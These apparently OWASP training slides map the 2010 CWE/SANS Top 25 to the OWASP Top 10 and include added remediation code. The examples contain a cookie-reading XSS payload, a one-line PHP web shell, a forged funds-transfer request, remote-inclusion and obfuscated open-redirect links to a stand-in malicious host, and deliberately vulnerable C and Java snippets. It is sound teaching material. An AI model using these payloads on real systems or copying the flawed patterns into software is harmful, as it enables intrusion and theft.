The OWASP Foundation
http://www.owasp.org
OWASP Education: Computer based training
2010 CWE/SANS Top 25 with OWASP Top 10 and PCI DSS V2 Mapping
Nishi Kumar
IT Architect Specialist, FIS
OWASP CBT Project Lead
OWASP Global Industry [email protected]
Keith Turpin
The Boeing Company
OWASP Secure Coding Practices Lead
OWASP Global Projects Committee
Objectives
Provide an overview of the 2010 CWE/SANS Top 25
Discuss mapping relationships between CWE/SANS Top 25, OWASP Top 10 for 2010 and PCI DSS V2
Understand the CWE/SANS Top 25 weaknesses and how to remediate them
Organizations
MITRE - http://www.mitre.org/
The MITRE Corporation is a not-for-profit organization that manages several Federally Funded Research and Development Centers. MITRE currently runs various IT security projects including the Common Weakness Enumeration (CWE) and it is the official source for the CWE/SANS Top 25 Most Dangerous Software Errors.
CWE Database - http://cwe.mitre.org/
SANS - http://www.sans.org
The SysAdmin, Audit, Network, Security (SANS) Institute operates as a commercial research and education company. SANS is well known for its Internet Storm Center, its comprehensive list of computing security training programs and its work with MITRE on the CWE/SANS Top 25 Most Dangerous Software Errors.
Selection and Ranking
Builds on the original 2009 version
Methodology - Qualitative rather than quantitative
Factors in ranking - Prevalence and Severity
Initially started with 41 candidate weaknesses
2010 CWE/SANS Top 25
Rank ID Name
[1] CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
[2] CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
[3] CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
[4] CWE-352 Cross-Site Request Forgery (CSRF)
[5] CWE-285 Improper Authorization
[6] CWE-807 Reliance on Untrusted Inputs in a Security Decision
[7] CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
[8] CWE-434 Unrestricted Upload of File with Dangerous Type
[9] CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
[10] CWE-311 Missing Encryption of Sensitive Data
[11] CWE-798 Use of Hard-coded Credentials
[12] CWE-805 Buffer Access with Incorrect Length Value
SANS CWE Top 25
Rank ID Name
[13] CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
[14] CWE-129 Improper Validation of Array Index
[15] CWE-754 Improper Check for Unusual or Exceptional Conditions
[16] CWE-209 Information Exposure Through an Error Message
[17] CWE-190 Integer Overflow or Wraparound
[18] CWE-131 Incorrect Calculation of Buffer Size
[19] CWE-306 Missing Authentication for Critical Function
[20] CWE-494 Download of Code Without Integrity Check
[21] CWE-732 Incorrect Permission Assignment for Critical Resource
[22] CWE-770 Allocation of Resources Without Limits or Throttling
[23] CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
[24] CWE-327 Use of a Broken or Risky Cryptographic Algorithm
[25] CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
OWASP Top 10 & SANS CWE Top 25 mapping
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
http://www.sans.org/top25-software-errors/
http://cwe.mitre.org/top25/
A1: Injection
  [2] CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
  [9] CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
A2: Cross-Site Scripting (XSS)
  [1] CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
A3: Broken Authentication and Session Management
  [19] CWE-306: Missing Authentication for Critical Function
  [11] CWE-798: Use of Hard-coded Credentials
A4: Insecure Direct Object References
  [5] CWE-285: Improper Authorization
  [6] CWE-807: Reliance on Untrusted Inputs in a Security Decision
  [7] CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
A5: Cross-Site Request Forgery (CSRF)
  [4] CWE-352: Cross-Site Request Forgery (CSRF)
OWASP Top 10 & SANS CWE Top 25 mapping
A6: Security Misconfiguration
  [16] CWE-209: Information Exposure Through an Error Message (only partially covers the OWASP risk)
A7: Insecure Cryptographic Storage
  [10] CWE-311: Missing Encryption of Sensitive Data
  [24] CWE-327: Use of a Broken or Risky Cryptographic Algorithm
A8: Failure to Restrict URL Access
  [5] CWE-285: Improper Authorization (also listed with OWASP A4)
  [21] CWE-732: Incorrect Permission Assignment for Critical Resource (CWE-732 covers a broader scope than OWASP A8)
A9: Insufficient Transport Layer Protection
  [10] CWE-311: Missing Encryption of Sensitive Data (also listed with OWASP A7)
  [24] CWE-327: Use of a Broken or Risky Cryptographic Algorithm (also listed with OWASP A7)
A10: Unvalidated Redirects and Forwards
  [23] CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
SANS CWE Top 25
The following do not directly map to the OWASP Top 10 2010:
[3] CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
[8] CWE-434: Unrestricted Upload of File with Dangerous Type
[12] CWE-805: Buffer Access with Incorrect Length Value
[13] CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
[14] CWE-129: Improper Validation of Array Index
[15] CWE-754: Improper Check for Unusual or Exceptional Conditions
[17] CWE-190: Integer Overflow or Wraparound
[18] CWE-131: Incorrect Calculation of Buffer Size
[20] CWE-494: Download of Code Without Integrity Check
[22] CWE-770: Allocation of Resources Without Limits or Throttling
[25] CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
Mapping Considerations
SANS CWE Top 25 is only a fraction of the full CWE list of weaknesses
The SANS CWE Top 25 targets both web and non-web applications
OWASP defines ten risks focused on web applications
OWASP's list tends to have broader weaknesses - made up of several specific vulnerabilities
PCI DSS Requirements point to both as industry best practices
[1] CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Try this in your browser: <script>javascript:alert(document.cookie)</script>
E.g. output encoding: < becomes &lt;, > becomes &gt;, & becomes &amp; and " becomes &quot;, so <script> -> &lt;script&gt; (rendered as text, not markup)
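The encoding step above, written out as an added example in C (this is not code from the slides; html_encode, entity_for and encoded_is_inert are names chosen here). It applies the slide's four substitutions, adds the single quote so the output is also safe inside quoted attributes, and refuses to write past the output buffer rather than truncating an entity in the middle:

```c
#include <stddef.h>
#include <string.h>

/* Entity for a character that must not reach the HTML parser raw, or NULL. */
static const char *entity_for(char c) {
    switch (c) {
    case '<':  return "&lt;";
    case '>':  return "&gt;";
    case '&':  return "&amp;";
    case '"':  return "&quot;";
    case '\'': return "&#x27;";   /* extra: protects single-quoted attributes */
    default:   return NULL;
    }
}

/* Encode `in` for insertion into an HTML body or quoted attribute.
 * Returns the encoded length (without the NUL) or -1 if `out` is too small;
 * on -1 `out` is left empty, never holding a half-written entity. */
int html_encode(const char *in, char *out, size_t out_cap) {
    size_t pos = 0;
    for (const char *p = in; *p; p++) {
        const char *ent = entity_for(*p);
        size_t n = ent ? strlen(ent) : 1;
        if (pos + n + 1 > out_cap) {      /* +1 keeps room for the terminator */
            if (out_cap) out[0] = '\0';
            return -1;
        }
        if (ent) memcpy(out + pos, ent, n);
        else     out[pos] = *p;
        pos += n;
    }
    out[pos] = '\0';
    return (int)pos;
}

/* Review helper: 1 if the encoded text contains no raw markup characters. */
int encoded_is_inert(const char *encoded) {
    return strpbrk(encoded, "<>\"'") == NULL;
}
```

The check in encoded_is_inert is what a unit test for any output-encoding routine should assert: whatever the input, the characters that open a tag, close a tag or terminate an attribute never survive unencoded.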
[2] CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
[3] CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Example: C
char last_name[20];                     /* Declare array with 20 character limit */
...
printf ("Enter your last name: ");
scanf ("%s", last_name);                /* Get input (no limit) and store in array */
The software does not limit the size of the name entered by the user, so an entry of more than 20 characters will cause a buffer overflow, since the "last_name" array can only hold 20 characters.
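A bounded replacement for the scanf call above, as an added example (not from the slides; read_last_name_from and NAME_CAP are names chosen here). The one change that matters is the field width in the format string, which caps what scanf may store; the helper also reports truncation so the caller can tell the user instead of silently keeping a shortened name:

```c
#include <stdio.h>
#include <string.h>

#define NAME_CAP 20   /* same 20-byte buffer as the slide's last_name[20] */

/* Copies at most NAME_CAP-1 characters of the first whitespace-delimited word
 * in `input` into `dst` and always NUL-terminates.
 * Returns 1 if the whole word fit, 0 if it was truncated or absent. */
int read_last_name_from(const char *input, char dst[NAME_CAP]) {
    dst[0] = '\0';
    /* "%19s" is what the original scanf("%s", ...) lacks: at most 19
     * characters plus the terminator are stored, so dst cannot overrun. */
    if (sscanf(input, "%19s", dst) != 1)
        return 0;
    const char *word = input + strspn(input, " \t\r\n");
    size_t word_len = strcspn(word, " \t\r\n");
    return word_len < NAME_CAP;
}

int main(void) {
    char line[256];
    char last_name[NAME_CAP];
    printf("Enter your last name: ");
    if (fgets(line, sizeof line, stdin) == NULL)   /* fgets is bounded by sizeof line */
        return 1;
    if (!read_last_name_from(line, last_name))
        fprintf(stderr, "name truncated to %d characters\n", NAME_CAP - 1);
    printf("Hello, %s\n", last_name);
    return 0;
}
```

Reading the whole line with fgets and parsing it with sscanf keeps every bound visible at the call site; the remaining risk is the silent truncation, which is why the function returns a flag instead of pretending the input fit.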
[4] CWE-352 Cross-Site Request Forgery (CSRF)
Example of a legitimate request:
http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
Example of a forged request using a hidden image tag:
<img src=http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct# width="0" height="0" />
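How the transferFunds handler can tell the two requests above apart, as an added example in C (not from the slides; transfer_request_allowed and tokens_equal are names chosen here, and the token storage is assumed to exist server-side). The forged image request arrives with the victim's cookies, but it is a GET and it cannot carry the per-session token, so it fails both checks:

```c
#include <stddef.h>
#include <string.h>

/* Compare two tokens in time that does not depend on where they first differ. */
static int tokens_equal(const char *a, const char *b) {
    size_t la = strlen(a), lb = strlen(b);
    if (la != lb) return 0;
    unsigned char diff = 0;
    for (size_t i = 0; i < la; i++)
        diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}

/* Returns 1 if the transfer may proceed, 0 if the request must be rejected.
 * `session_token` is the anti-CSRF token stored for this session;
 * `request_token` is the hidden form field value (NULL when absent). */
int transfer_request_allowed(const char *method,
                             const char *session_token,
                             const char *request_token) {
    /* A state-changing action must never be reachable by GET: that is
     * exactly the request an <img src=...> tag issues. */
    if (strcmp(method, "POST") != 0)
        return 0;
    if (session_token == NULL || session_token[0] == '\0' || request_token == NULL)
        return 0;
    return tokens_equal(session_token, request_token);
}
```

The token only helps if the browser's same-origin policy keeps it out of reach of other sites, so it must be delivered in the page body or a header, never in a cookie alone.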
[5] CWE-285 Improper Authorization
[6] CWE-807 Reliance on Untrusted Inputs in a Security Decision
[7] CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
[8] CWE-434 Unrestricted Upload of File with Dangerous Type
Example: PHP
<?php
system($_GET['cmd']);
?>
[9] CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
[10] CWE-311 Missing Encryption of Sensitive Data
[11] CWE-798 Use of Hard-coded Credentials
[12] CWE-805 Buffer Access with Incorrect Length Value
[13] CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
Example: PHP
$dir = $_GET['module_name'];
include($dir . "/function.php");
Malicious call to a remote file: /victim.php?module_name=http://malicious.example.com
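One allowlist-based check that serves both the [8] CWE-434 upload example and the [13] CWE-98 include example, as an added example in C (not from the slides; upload_name_allowed, resolve_module, the extension and module tables and the modules/ directory layout are all assumptions made here). In both cases the user-supplied string is never used as a path: an upload is stored only if its name is plain and its extension is on the list, and a module name is accepted only if it matches an entry in a fixed table, which is then turned into the real include path:

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Extensions the upload handler may store; .php is absent on purpose, so a
 * file containing the slide's system($_GET['cmd']) is refused. */
static const char *const ALLOWED_EXT[] = { ".png", ".jpg", ".pdf", NULL };

/* Modules that may be included; the request value selects one of these. */
static const char *const ALLOWED_MODULES[] = { "search", "profile", "report", NULL };

static int has_allowed_ext(const char *name) {
    const char *dot = strrchr(name, '.');
    if (!dot) return 0;
    for (int i = 0; ALLOWED_EXT[i]; i++)
        if (strcmp(dot, ALLOWED_EXT[i]) == 0) return 1;
    return 0;
}

/* 1 if `name` is a plain file name: 1-64 bytes of [A-Za-z0-9._-], not
 * starting with '.', no ".." anywhere (and therefore no separators). */
int is_plain_name(const char *name) {
    size_t n = strlen(name);
    if (n == 0 || n > 64 || name[0] == '.') return 0;
    if (strstr(name, "..")) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-')) return 0;
    }
    return 1;
}

/* CWE-434: store an upload only if its name is plain, has exactly one dot
 * (no double extensions) and the extension is allowlisted. */
int upload_name_allowed(const char *name) {
    if (!is_plain_name(name)) return 0;
    if (strchr(name, '.') != strrchr(name, '.')) return 0;
    return has_allowed_ext(name);
}

/* CWE-98: map module_name onto the table; on success `out` receives
 * "modules/<name>/function.php", otherwise NULL is returned. */
const char *resolve_module(const char *module_name, char *out, size_t out_cap) {
    for (int i = 0; ALLOWED_MODULES[i]; i++) {
        if (strcmp(module_name, ALLOWED_MODULES[i]) == 0) {
            int n = snprintf(out, out_cap, "modules/%s/function.php", ALLOWED_MODULES[i]);
            return (n > 0 && (size_t)n < out_cap) ? out : NULL;
        }
    }
    return NULL;
}
```

Because the include path is built from the table entry rather than from the request, a remote URL or a traversal sequence in module_name simply fails to match and nothing is included.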
[14] CWE-129 Improper Validation of Array Index
Example: Java
public String getValue(int index) {
    return array[index];
}
If index is outside of the range of the array, this may result in an ArrayIndexOutOfBoundsException being raised.
[15] CWE-754 Improper Check for Unusual or Exceptional Condition
Example: Java (bad code)
String itemName = request.getParameter(ITEM_NAME);
if (itemName.compareTo(IMPORTANT_ITEM) == 0) {
    ...
}
The code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference.
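The two checks that the [14] CWE-129 and [15] CWE-754 examples omit, as one added example in C (not from the slides; get_value, is_important_item and the status codes are names chosen here). The index is validated against the array length before it is used, and a missing request parameter is treated as an ordinary, expected outcome that the caller must handle rather than a condition that is allowed to crash the program:

```c
#include <stddef.h>
#include <string.h>

enum { OK = 0, ERR_RANGE = -1, ERR_NULL = -2 };

/* Bounds-checked counterpart of the slide's getValue(): the caller receives
 * a status code instead of an out-of-range read. A negative index is
 * rejected before it is compared with the (unsigned) length. */
int get_value(const int *array, size_t len, long index, int *out) {
    if (array == NULL || out == NULL) return ERR_NULL;
    if (index < 0 || (unsigned long)index >= len) return ERR_RANGE;
    *out = array[index];
    return OK;
}

/* Counterpart of the slide's compareTo(): a parameter that was not sent is
 * a normal case. Returns 1 if item_name names the important item, 0 if it
 * does not, and ERR_NULL if the parameter was absent. */
int is_important_item(const char *item_name, const char *important_item) {
    if (item_name == NULL) return ERR_NULL;
    return strcmp(item_name, important_item) == 0 ? 1 : 0;
}
```

Returning a distinct code for "absent" rather than folding it into "not equal" keeps the security decision explicit: the caller has to decide what an unauthenticated or malformed request should do instead of inheriting whatever the comparison happens to return.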
[16] CWE-209 Information Exposure Through an Error Message
Example: Java
In the following example, sensitive information might be printed depending on the exception that occurs. If an exception related to SQL is handled by the catch, then the output might contain sensitive information such as SQL query structure or private information.
try {
    /* ... */
} catch (Exception e) {
    System.out.println(e);
}
If this output is redirected to a web user, this may represent a security problem.
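The split a handler should make instead, as an added example in C (not from the slides; report_error, user_message_leaks and the message formats are choices made here, and the two output buffers stand in for the HTTP response and the server log). The user receives a generic message with a reference number; the exception detail goes only to the log line that carries the same reference, so support staff can still correlate the two:

```c
#include <stdio.h>
#include <string.h>

/* Writes the user-facing text to `user_msg` and the full detail to `log_line`.
 * Returns the reference id that ties the two together. */
unsigned long report_error(unsigned long ref_id, const char *detail,
                           char *user_msg, size_t user_cap,
                           char *log_line, size_t log_cap) {
    snprintf(user_msg, user_cap,
             "The request could not be completed. Reference: %lu", ref_id);
    /* Only the log sees the exception text (query structure, paths, ...). */
    snprintf(log_line, log_cap, "ref=%lu detail=%s", ref_id, detail);
    return ref_id;
}

/* Review/test helper: 1 if any of the detailed text reached the user message. */
int user_message_leaks(const char *user_msg, const char *detail) {
    return strstr(user_msg, detail) != NULL;
}
```

A test like user_message_leaks, run over every error path with a recognisable marker in the detail string, is a cheap way to catch handlers that still print the exception to the response.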
[17] CWE-190 Integer Overflow or Wraparound
Example: C
nresp = packet_get_int();
if (nresp > 0) {
    response = xmalloc(nresp * sizeof(char *));
    for (i = 0; i < nresp; i++)
        response[i] = packet_get_string(NULL);
}
If nresp has the value 1073741824 and sizeof(char*) has its typical value of 4, then the result of the operation nresp*sizeof(char*) overflows, and the argument to xmalloc() will be 0, causing the subsequent loop iterations to overflow the heap buffer response.
[18] CWE-131 Incorrect Calculation of Buffer Size
Example: C
int *id_sequence;
id_sequence = (int *) malloc(3);
if (id_sequence == NULL) exit(1);
id_sequence[0] = 13579;
id_sequence[1] = 24680;
id_sequence[2] = 97531;
The size parameter used during the malloc() call is set to '3', which results in a buffer of 3 bytes. The intent was to create a buffer that holds three ints, and in C each int requires 4 bytes, so an array of 12 bytes is needed. Executing the above code could result in a buffer overflow, as 12 bytes of data are being saved into 3 bytes of allocated space.
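One allocation helper that addresses both the [17] CWE-190 and the [18] CWE-131 examples, as an added example in C (not from the slides; mul_overflows, alloc_responses, alloc_ids and the MAX_RESPONSES ceiling are choices made here). The byte count is always derived from the element type, the count * size product is checked for wraparound before it reaches the allocator, and an attacker-controlled count is also capped at a value that makes sense for the protocol:

```c
#include <stdint.h>
#include <stdlib.h>

/* 1 if n * size does not fit in size_t; otherwise stores the product in *out. */
int mul_overflows(size_t n, size_t size, size_t *out) {
    if (n != 0 && size > SIZE_MAX / n) return 1;
    *out = n * size;
    return 0;
}

/* The slide's nresp case: refuse a count that is negative, zero, above a
 * sane ceiling, or whose byte size would wrap. */
#define MAX_RESPONSES 65536
char **alloc_responses(long nresp) {
    size_t bytes;
    if (nresp <= 0 || nresp > MAX_RESPONSES) return NULL;
    if (mul_overflows((size_t)nresp, sizeof(char *), &bytes)) return NULL;
    /* calloc takes count and size separately and checks the product itself */
    return calloc((size_t)nresp, sizeof(char *));
}

/* The slide's id_sequence case: three ints get 3 * sizeof(int) bytes,
 * so the size follows the type rather than a hand-written literal. */
int *alloc_ids(size_t count) {
    size_t bytes;
    if (mul_overflows(count, sizeof(int), &bytes)) return NULL;
    return malloc(bytes);
}
```

The first test below reproduces the slide's numbers: 1073741824 * 4 wraps to 0 only on a 32-bit size_t, which is why the ceiling check is kept as well; a count that merely "fits" can still be far larger than any legitimate packet.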
[19] CWE-306 Missing Authentication for Critical Function
[20] CWE-494 Download of Code Without Integrity Check
Example: Java
URL[] classURLs = new URL[]{ new URL("file:subdir/") };
URLClassLoader loader = new URLClassLoader(classURLs);
Class loadedClass = Class.forName("loadMe", true, loader);
This code does not ensure that the class loaded is the intended one, for example by verifying the class's checksum.
[21] CWE-732 Incorrect Permission Assignment for Critical Resource
[22] CWE-770 Allocation of Resources Without Limits or Throttling
Example: C and C++
sock = socket(AF_INET, SOCK_STREAM, 0);
while (1) {
    newsock = accept(sock, ...);
    printf("A connection has been accepted\n");
    pid = fork();
}
This code allocates a socket and forks each time it receives a new connection. The program does not track how many connections have been made, and it does not limit the number of connections. A large number of connections could cause the system to run out of resources.
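The missing counter and limit, as an added example in C (not from the slides; admit_connection, release_connection, serve_forever and the MAX_CHILDREN value are choices made here). The limiter is consulted before every fork, finished children are reaped so their slots come back, and a connection that arrives over the limit is closed immediately instead of being given a process:

```c
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAX_CHILDREN 64   /* ceiling for concurrent children; size it for the host */

struct limiter { unsigned active, max, refused; };

/* Call before fork(): returns 1 to admit the connection, 0 to refuse it. */
int admit_connection(struct limiter *l) {
    if (l->active >= l->max) { l->refused++; return 0; }
    l->active++;
    return 1;
}

/* Call once per reaped child so its slot is returned. */
void release_connection(struct limiter *l) {
    if (l->active > 0) l->active--;
}

/* The slide's accept/fork loop with the limiter added (not run by the tests). */
void serve_forever(int sock, struct limiter *l) {
    static const char banner[] = "A connection has been accepted\n";
    for (;;) {
        int newsock = accept(sock, NULL, NULL);
        if (newsock < 0) continue;
        /* Reap finished children first so their slots are free again. */
        while (waitpid(-1, NULL, WNOHANG) > 0) release_connection(l);
        if (!admit_connection(l)) { close(newsock); continue; }   /* over the limit */
        pid_t pid = fork();
        if (pid == 0) {                        /* child: serve the client and exit */
            (void)write(newsock, banner, sizeof banner - 1);
            _exit(0);
        }
        if (pid < 0) release_connection(l);    /* fork failed: give the slot back */
        close(newsock);                        /* parent keeps only the listening socket */
    }
}
```

The refused counter is worth exporting as a metric: a sustained non-zero rate is the earliest signal that the limit is being hit, whether by load or by a deliberate flood.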
[23] CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
Example: PHP
$redirect_url = $_GET['url'];
header("Location: " . $redirect_url);
This page could be used as part of a phishing scam by initiating on a trusted domain but redirecting users to a malicious site. An attacker could supply a user with the following link:
http://example.com/example.php?url=http://malicious.example.com
This is the same URL, only obfuscated with URL encoding to mask the off-site redirect:
http://example.com/example.php?url=%68%74%74%70%3a%2f%2f%6d%61%6c%69%63%69%6f%75%73%2e%65%78%61%6d%70%6c%65%2e%63%6f%6d
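A validation routine for the url parameter, as an added example in C (not from the slides; percent_decode, redirect_target_allowed, safe_redirect and the ALLOWED_HOSTS table are choices made here). It decodes the value first, so the percent-encoded form of the link above is judged on its decoded content, and then accepts only a local path or an https URL whose host is on the allowlist:

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

static const char *const ALLOWED_HOSTS[] = { "example.com", "www.example.com", NULL };

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Percent-decodes `in` into `out`; returns 0 on a malformed escape or if
 * `out` is too small. Decoding before validation is what defeats the
 * obfuscated link on the slide. */
int percent_decode(const char *in, char *out, size_t cap) {
    size_t o = 0;
    for (size_t i = 0; in[i]; i++) {
        if (o + 1 >= cap) return 0;
        if (in[i] == '%') {
            int hi = hexval((unsigned char)in[i + 1]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)in[i + 2]);
            if (lo < 0) return 0;
            out[o++] = (char)(hi * 16 + lo);
            i += 2;
        } else {
            out[o++] = in[i];
        }
    }
    out[o] = '\0';
    return 1;
}

/* 1 if the decoded target may be placed in a Location header. */
int redirect_target_allowed(const char *decoded) {
    /* A local path is fine; "//host" and "/\host" are protocol-relative and are not. */
    if (decoded[0] == '/' && decoded[1] != '/' && decoded[1] != '\\') return 1;
    /* Otherwise require https:// followed by an allowlisted host, compared
     * up to the first "/", "?" or "#" so userinfo or a longer host cannot match. */
    if (strncmp(decoded, "https://", 8) != 0) return 0;
    const char *host = decoded + 8;
    size_t hl = strcspn(host, "/?#");
    for (int i = 0; ALLOWED_HOSTS[i]; i++)
        if (strlen(ALLOWED_HOSTS[i]) == hl && strncmp(host, ALLOWED_HOSTS[i], hl) == 0)
            return 1;
    return 0;
}

/* Combined check for the raw query value; `out` receives the decoded target. */
int safe_redirect(const char *raw_url_param, char *out, size_t cap) {
    if (!percent_decode(raw_url_param, out, cap)) return 0;
    return redirect_target_allowed(out);
}
```

The host comparison is exact, so "example.com.evil.test" or a host followed by "@" does not pass; if the application needs subdomains, add them to the table rather than loosening the match.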
[24] CWE-327 Use of a Broken or Risky Cryptographic Algorithm
[25] CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')